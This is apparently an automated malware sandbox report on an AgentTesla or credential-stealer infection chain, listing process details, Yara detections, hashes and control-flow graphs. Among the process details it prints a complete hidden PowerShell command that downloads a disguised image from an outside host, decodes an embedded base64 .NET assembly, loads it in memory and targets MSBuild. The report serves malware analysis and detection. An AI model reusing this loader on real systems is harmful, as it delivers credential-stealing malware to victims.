                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:06:48:13
                                                                                                                              Start date:24/04/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:06:48:26
                                                                                                                              Start date:24/04/2024
                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              Imagebase:0x1b0000
                                                                                                                              File size:262'432 bytes
                                                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:06:48:26
                                                                                                                              Start date:24/04/2024
                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              Imagebase:0x20000
                                                                                                                              File size:262'432 bytes
                                                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:06:48:26
                                                                                                                              Start date:24/04/2024
                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              Imagebase:0xea0000
                                                                                                                              File size:262'432 bytes
                                                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3315094213.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3315094213.000000000328E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3315094213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              Reset < >
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2575542228.00007FF848D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7ff848d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                • Instruction ID: 2da2acc551757e0a571743a8a402bc2778ad2de156ad5e19b6d4e1f5af17e6c8
                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                • Instruction Fuzzy Hash: 5E01447111CB094FD748EF0CE451AA6B7E0FB95364F10056DE58AC3655D726E882CB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:11.5%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:42
                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                execution_graph 29644 3207050 29645 320705a 29644->29645 29646 320709c 29645->29646 29652 66dcec0 29645->29652 29657 66dceb0 29645->29657 29647 320706d 29662 66de268 29647->29662 29666 66de258 29647->29666 29654 66dced5 29652->29654 29653 66dd0ea 29653->29647 29654->29653 29655 66dd50b GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29654->29655 29656 66dd518 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29654->29656 29655->29654 29656->29654 29659 66dced5 29657->29659 29658 66dd0ea 29658->29647 29659->29658 29660 66dd518 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29659->29660 29661 66dd50b GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29659->29661 29660->29659 29661->29659 29664 66de282 29662->29664 29663 66dd518 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29663->29664 29664->29663 29665 66de4c9 29664->29665 29665->29646 29668 66de282 29666->29668 29667 66dd518 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 29667->29668 29668->29667 29669 66de4c9 29668->29669 29669->29646 29632 6f30c50 29636 6f30c63 29632->29636 29640 6f30c70 29632->29640 29633 6f30c5a 29637 6f30c69 29636->29637 29637->29637 29638 6f30d0a CallWindowProcW 29637->29638 29639 6f30cb9 29637->29639 29638->29639 29639->29633 29641 6f30cb2 29640->29641 29643 6f30cb9 29640->29643 29642 6f30d0a CallWindowProcW 29641->29642 29641->29643 29642->29643 29643->29633 29670 6f32f68 29671 6f32f90 29670->29671 29674 6f32fbc 29670->29674 29672 6f32f99 29671->29672 29675 6f323d4 29671->29675 29676 6f323df 29675->29676 29677 6f332b3 29676->29677 29679 6f323f0 29676->29679 29677->29674 29680 6f332e8 OleInitialize 29679->29680 29681 6f3334c 29680->29681 29681->29677
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-3723351465
                                                                                                                                • Opcode ID: fca79d325935de18410640fc943a530e4d48cf17733cfe31fb3c03e22e7d0c8a
                                                                                                                                • Instruction ID: 049e840c906980123961b6443f222a0504176f930e8a00f972eac4cbd50e4765
                                                                                                                                • Opcode Fuzzy Hash: fca79d325935de18410640fc943a530e4d48cf17733cfe31fb3c03e22e7d0c8a
                                                                                                                                • Instruction Fuzzy Hash: B7826B34E106098FCB54DF68D594A9DB7B2FF89300F54C6AAD409AB365EB70ED85CB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-3723351465
                                                                                                                                • Opcode ID: 7f7202994555842780b45b5e1a3b91cb85107a35cf89fe9b2cc997f359971df9
                                                                                                                                • Instruction ID: 52275e416cd7c7ffbd65fce1251cedea4298ef3f8d721b507247a7b7b0273eb3
                                                                                                                                • Opcode Fuzzy Hash: 7f7202994555842780b45b5e1a3b91cb85107a35cf89fe9b2cc997f359971df9
                                                                                                                                • Instruction Fuzzy Hash: A0527F30E102098FDFA4DF69D9847AEB7B6FB85350F20892AE409DB391DA35DC45CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 798 3204178-32041de 800 32041e0-32041eb 798->800 801 3204228-320422a 798->801 800->801 802 32041ed-32041f9 800->802 803 320422c-3204245 801->803 804 32041fb-3204205 802->804 805 320421c-3204226 802->805 810 3204291-3204293 803->810 811 3204247-3204253 803->811 806 3204207 804->806 807 3204209-3204218 804->807 805->803 806->807 807->807 809 320421a 807->809 809->805 812 3204295-32042ed 810->812 811->810 813 3204255-3204261 811->813 822 3204337-3204339 812->822 823 32042ef-32042fa 812->823 814 3204263-320426d 813->814 815 3204284-320428f 813->815 817 3204271-3204280 814->817 818 320426f 814->818 815->812 817->817 819 3204282 817->819 818->817 819->815 825 320433b-3204353 822->825 823->822 824 32042fc-3204308 823->824 826 320430a-3204314 824->826 827 320432b-3204335 824->827 831 3204355-3204360 825->831 832 320439d-320439f 825->832 829 3204316 826->829 830 3204318-3204327 826->830 827->825 829->830 830->830 833 3204329 830->833 831->832 835 3204362-320436e 831->835 834 32043a1-32043f2 832->834 833->827 843 32043f8-3204406 834->843 836 3204370-320437a 835->836 837 3204391-320439b 835->837 838 320437c 836->838 839 320437e-320438d 836->839 837->834 838->839 839->839 841 320438f 839->841 841->837 844 3204408-320440e 843->844 845 320440f-320446f 843->845 844->845 852 3204471-3204475 845->852 853 320447f-3204483 845->853 852->853 856 3204477 852->856 854 3204493-3204497 853->854 855 3204485-3204489 853->855 858 32044a7-32044ab 854->858 859 3204499-320449d 854->859 855->854 857 320448b 855->857 856->853 857->854 861 32044bb-32044bf 858->861 862 32044ad-32044b1 858->862 859->858 860 320449f-32044a2 call 3200ab8 859->860 860->858 865 32044c1-32044c5 861->865 866 32044cf-32044d3 861->866 862->861 864 32044b3-32044b6 call 3200ab8 862->864 864->861 865->866 870 32044c7-32044ca call 3200ab8 865->870 867 32044e3-32044e7 866->867 868 32044d5-32044d9 866->868 872 32044f7 867->872 873 32044e9-32044ed 867->873 868->867 871 32044db 868->871 870->866 871->867 876 32044f8 872->876 873->872 875 32044ef 873->875 875->872 876->876
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3$\V]o
                                                                                                                                • API String ID: 0-3066536677
                                                                                                                                • Opcode ID: 26034a487c13dc8c6d36cdb3d853efc5dbe4a75566aa4f93e5a4253336c5847c
                                                                                                                                • Instruction ID: 1afdf7c19cb9b773b5fba80506ade7a3e2fa7959deb0eab0159b3b869a7bf0c6
                                                                                                                                • Opcode Fuzzy Hash: 26034a487c13dc8c6d36cdb3d853efc5dbe4a75566aa4f93e5a4253336c5847c
                                                                                                                                • Instruction Fuzzy Hash: 9CB15170E1020A9FDF14DFAAC98579DBBF2AF88304F18C129D915A7295EB749889CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 877 3203e30-3203e96 879 3203ee0-3203ee2 877->879 880 3203e98-3203ea3 877->880 881 3203ee4-3203f3c 879->881 880->879 882 3203ea5-3203eb1 880->882 891 3203f86-3203f88 881->891 892 3203f3e-3203f49 881->892 883 3203eb3-3203ebd 882->883 884 3203ed4-3203ede 882->884 885 3203ec1-3203ed0 883->885 886 3203ebf 883->886 884->881 885->885 888 3203ed2 885->888 886->885 888->884 893 3203f8a-3203fa2 891->893 892->891 894 3203f4b-3203f57 892->894 901 3203fa4-3203faf 893->901 902 3203fec-3203fee 893->902 895 3203f59-3203f63 894->895 896 3203f7a-3203f84 894->896 898 3203f65 895->898 899 3203f67-3203f76 895->899 896->893 898->899 899->899 900 3203f78 899->900 900->896 901->902 904 3203fb1-3203fbd 901->904 903 3203ff0-3204052 902->903 913 3204054-320405a 903->913 914 320405b-32040bb 903->914 905 3203fe0-3203fea 904->905 906 3203fbf-3203fc9 904->906 905->903 907 3203fcb 906->907 908 3203fcd-3203fdc 906->908 907->908 908->908 910 3203fde 908->910 910->905 913->914 921 32040cb-32040cf 914->921 922 32040bd-32040c1 914->922 924 32040d1-32040d5 921->924 925 32040df-32040e3 921->925 922->921 923 32040c3 922->923 923->921 924->925 926 32040d7-32040da call 3200ab8 924->926 927 32040f3 925->927 928 32040e5-32040e9 925->928 926->925 931 32040f7 927->931 928->927 930 32040eb-32040ee call 3200ab8 928->930 930->927 933 3204107-320410b 931->933 934 32040f9-32040fd 931->934 935 320411b-320411f 933->935 936 320410d-3204111 933->936 934->933 937 32040ff-3204102 call 3200ab8 934->937 940 3204121-3204125 935->940 941 320412f-3204170 935->941 936->935 939 3204113 936->939 937->933 939->935 940->941 942 3204127 940->942 941->931 944 3204172-32041de 941->944 942->941 947 32041e0-32041eb 944->947 948 3204228-320422a 944->948 947->948 949 32041ed-32041f9 947->949 950 320422c-3204245 948->950 951 32041fb-3204205 949->951 952 320421c-3204226 949->952 957 3204291-3204293 950->957 958 3204247-3204253 950->958 953 3204207 951->953 954 3204209-3204218 951->954 952->950 953->954 954->954 956 320421a 954->956 956->952 959 3204295-32042ed 957->959 958->957 960 3204255-3204261 958->960 969 3204337-3204339 959->969 970 32042ef-32042fa 959->970 961 3204263-320426d 960->961 962 3204284-320428f 960->962 964 3204271-3204280 961->964 965 320426f 961->965 962->959 964->964 966 3204282 964->966 965->964 966->962 972 320433b-3204353 969->972 970->969 971 32042fc-3204308 970->971 973 320430a-3204314 971->973 974 320432b-3204335 971->974 978 3204355-3204360 972->978 979 320439d-320439f 972->979 976 3204316 973->976 977 3204318-3204327 973->977 974->972 976->977 977->977 980 3204329 977->980 978->979 982 3204362-320436e 978->982 981 32043a1-32043f2 979->981 980->974 990 32043f8-3204406 981->990 983 3204370-320437a 982->983 984 3204391-320439b 982->984 985 320437c 983->985 986 320437e-320438d 983->986 984->981 985->986 986->986 988 320438f 986->988 988->984 991 3204408-320440e 990->991 992 320440f-320446f 990->992 991->992 999 3204471-3204475 992->999 1000 320447f-3204483 992->1000 999->1000 1003 3204477 999->1003 1001 3204493-3204497 1000->1001 1002 3204485-3204489 1000->1002 1005 32044a7-32044ab 1001->1005 1006 3204499-320449d 1001->1006 1002->1001 1004 320448b 1002->1004 1003->1000 1004->1001 1008 32044bb-32044bf 1005->1008 1009 32044ad-32044b1 1005->1009 1006->1005 1007 320449f-32044a2 call 3200ab8 1006->1007 1007->1005 1012 32044c1-32044c5 1008->1012 1013 32044cf-32044d3 1008->1013 1009->1008 1011 32044b3-32044b6 call 3200ab8 1009->1011 1011->1008 1012->1013 1017 32044c7-32044ca call 3200ab8 1012->1017 1014 32044e3-32044e7 1013->1014 1015 32044d5-32044d9 1013->1015 1019 32044f7 1014->1019 1020 32044e9-32044ed 1014->1020 1015->1014 1018 32044db 1015->1018 1017->1013 1018->1014 1023 32044f8 1019->1023 1020->1019 1022 32044ef 1020->1022 1022->1019 1023->1023
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3$\V]o
                                                                                                                                • API String ID: 0-3066536677
                                                                                                                                • Opcode ID: c33b81b1ed9c868e86d9c7e98a33cfc07932ef0556a80b1f1feb292f57991431
                                                                                                                                • Instruction ID: ed82d6aa02560652841d592941b514e470cf837a4aa23f30cd0ec53df3262c78
                                                                                                                                • Opcode Fuzzy Hash: c33b81b1ed9c868e86d9c7e98a33cfc07932ef0556a80b1f1feb292f57991431
                                                                                                                                • Instruction Fuzzy Hash: E1918074E1020ADFDF14DFA9C98579DFBF2AF88304F188129E505A7295EB749889CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8e64351fe9f3c088bec88e49736c6d118bdb58babe41106d05779c544417a7c3
                                                                                                                                • Instruction ID: 4718d9268a18be6a79c9e537562f8a323f65e76297bb84bb91bfc87dc1725e9a
                                                                                                                                • Opcode Fuzzy Hash: 8e64351fe9f3c088bec88e49736c6d118bdb58babe41106d05779c544417a7c3
                                                                                                                                • Instruction Fuzzy Hash: B5630731C10B1A8ACB51EF68C8905A9F7B1FF99300F15D79AE4587B121FB70AAD5CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Xaq$$]q
                                                                                                                                • API String ID: 0-1280934391
                                                                                                                                • Opcode ID: 12af1c6efb85a88543f4a6d9712ae7088f88f2dc0beed9eb7c807657edfba725
                                                                                                                                • Instruction ID: 4b9afdcbd48688ab464d57aa58e0a4c01776d60c052267a9640523639bb18007
                                                                                                                                • Opcode Fuzzy Hash: 12af1c6efb85a88543f4a6d9712ae7088f88f2dc0beed9eb7c807657edfba725
                                                                                                                                • Instruction Fuzzy Hash: 64B19574F002188FDB58AB79989467E7BA7BFC8710B05886EE407E7398DE34DC128791
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3
                                                                                                                                • API String ID: 0-1855679173
                                                                                                                                • Opcode ID: 2e3077f3c390d1fa082e0c91290ea151546ead539a8065841ef92e73562795c1
                                                                                                                                • Instruction ID: 8793dcef048bd01f5bf70eebeec9c1d4270664fef54cb79e575764d643954c10
                                                                                                                                • Opcode Fuzzy Hash: 2e3077f3c390d1fa082e0c91290ea151546ead539a8065841ef92e73562795c1
                                                                                                                                • Instruction Fuzzy Hash: 2BB18270E1020A9FDF10DFAAD98179DBBF2AF88314F18C129D515E7295EB749889CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PH]q
                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                • Opcode ID: 24413eb7b2cb5e79616bccf14fb1fc2548c0b60ec7ef4af8c9735b3e1137a568
                                                                                                                                • Instruction ID: d010da4d10286eccef3b6a356819446670df584f3f00a2dbda66b3f52ec8e588
                                                                                                                                • Opcode Fuzzy Hash: 24413eb7b2cb5e79616bccf14fb1fc2548c0b60ec7ef4af8c9735b3e1137a568
                                                                                                                                • Instruction Fuzzy Hash: 7622BE70F002098FCB94DF68D884A6DB7E6EF89310F258569D40ADB365DB35EC46CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d484bd64f4e1f686aaca7080fd65a72edbc73393ebded42d7863f791907ea510
                                                                                                                                • Instruction ID: c4491b6d2f7bd1ca51eb749905b5d070832e1833f531bfffd4954d9633bb2e61
                                                                                                                                • Opcode Fuzzy Hash: d484bd64f4e1f686aaca7080fd65a72edbc73393ebded42d7863f791907ea510
                                                                                                                                • Instruction Fuzzy Hash: F0527B34F002049FDB54DBA9D594AADBBF2EF88344F148469E40ADB395DB75EC46CB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6bcd8397848edcf890c65709360d05f547b12b74fc7ef5d33ca26fbaaf504d9c
                                                                                                                                • Instruction ID: f7bea4dccb1efcd62d09025497ba5d9bc8a1a3b61d02b7b8df44364feb99fca4
                                                                                                                                • Opcode Fuzzy Hash: 6bcd8397848edcf890c65709360d05f547b12b74fc7ef5d33ca26fbaaf504d9c
                                                                                                                                • Instruction Fuzzy Hash: 07328135A102058FDB14DFA9D584BADBBB6FF88310F148565E80ADB3A6DB70DC85CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 610 32047c0-320484c 613 3204896-3204898 610->613 614 320484e-3204859 610->614 615 320489a-32048b2 613->615 614->613 616 320485b-3204867 614->616 622 32048b4-32048bf 615->622 623 32048fc-32048fe 615->623 617 3204869-3204873 616->617 618 320488a-3204894 616->618 620 3204875 617->620 621 3204877-3204886 617->621 618->615 620->621 621->621 624 3204888 621->624 622->623 626 32048c1-32048cd 622->626 625 3204900-3204959 623->625 624->618 635 3204962-3204982 625->635 636 320495b-3204961 625->636 627 32048f0-32048fa 626->627 628 32048cf-32048d9 626->628 627->625 629 32048db 628->629 630 32048dd-32048ec 628->630 629->630 630->630 632 32048ee 630->632 632->627 640 320498c-32049bf 635->640 636->635 643 32049c1-32049c5 640->643 644 32049cf-32049d3 640->644 643->644 645 32049c7-32049ca call 3200ab8 643->645 646 32049e3-32049e7 644->646 647 32049d5-32049d9 644->647 645->644 650 32049f7-32049fb 646->650 651 32049e9-32049ed 646->651 647->646 649 32049db-32049de call 3200ab8 647->649 649->646 654 3204a0b 650->654 655 32049fd-3204a01 650->655 651->650 653 32049ef 651->653 653->650 657 3204a0c 654->657 655->654 656 3204a03 655->656 656->654 657->657
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3$!3$\V]o$\V]o
                                                                                                                                • API String ID: 0-3904426955
                                                                                                                                • Opcode ID: 4d79166ccb1d49900588cd7244de4734bf6a75c66886e7a59332c28faa3fc7c3
                                                                                                                                • Instruction ID: 2f01e6075caa3bb6e3afb64573d713840379e479d3a1b6d081b0353206ef1a43
                                                                                                                                • Opcode Fuzzy Hash: 4d79166ccb1d49900588cd7244de4734bf6a75c66886e7a59332c28faa3fc7c3
                                                                                                                                • Instruction Fuzzy Hash: E7719C70E102498FDB14DFAAD98179EBBF2AF88304F18C529E514A7294EB749885CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 658 32047b4-320484c 661 3204896-3204898 658->661 662 320484e-3204859 658->662 663 320489a-32048b2 661->663 662->661 664 320485b-3204867 662->664 670 32048b4-32048bf 663->670 671 32048fc-32048fe 663->671 665 3204869-3204873 664->665 666 320488a-3204894 664->666 668 3204875 665->668 669 3204877-3204886 665->669 666->663 668->669 669->669 672 3204888 669->672 670->671 674 32048c1-32048cd 670->674 673 3204900-3204912 671->673 672->666 681 3204919-3204945 673->681 675 32048f0-32048fa 674->675 676 32048cf-32048d9 674->676 675->673 677 32048db 676->677 678 32048dd-32048ec 676->678 677->678 678->678 680 32048ee 678->680 680->675 682 320494b-3204959 681->682 683 3204962-3204970 682->683 684 320495b-3204961 682->684 687 3204978-3204982 683->687 684->683 688 320498c-32049bf 687->688 691 32049c1-32049c5 688->691 692 32049cf-32049d3 688->692 691->692 693 32049c7-32049ca call 3200ab8 691->693 694 32049e3-32049e7 692->694 695 32049d5-32049d9 692->695 693->692 698 32049f7-32049fb 694->698 699 32049e9-32049ed 694->699 695->694 697 32049db-32049de call 3200ab8 695->697 697->694 702 3204a0b 698->702 703 32049fd-3204a01 698->703 699->698 701 32049ef 699->701 701->698 705 3204a0c 702->705 703->702 704 3204a03 703->704 704->702 705->705
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
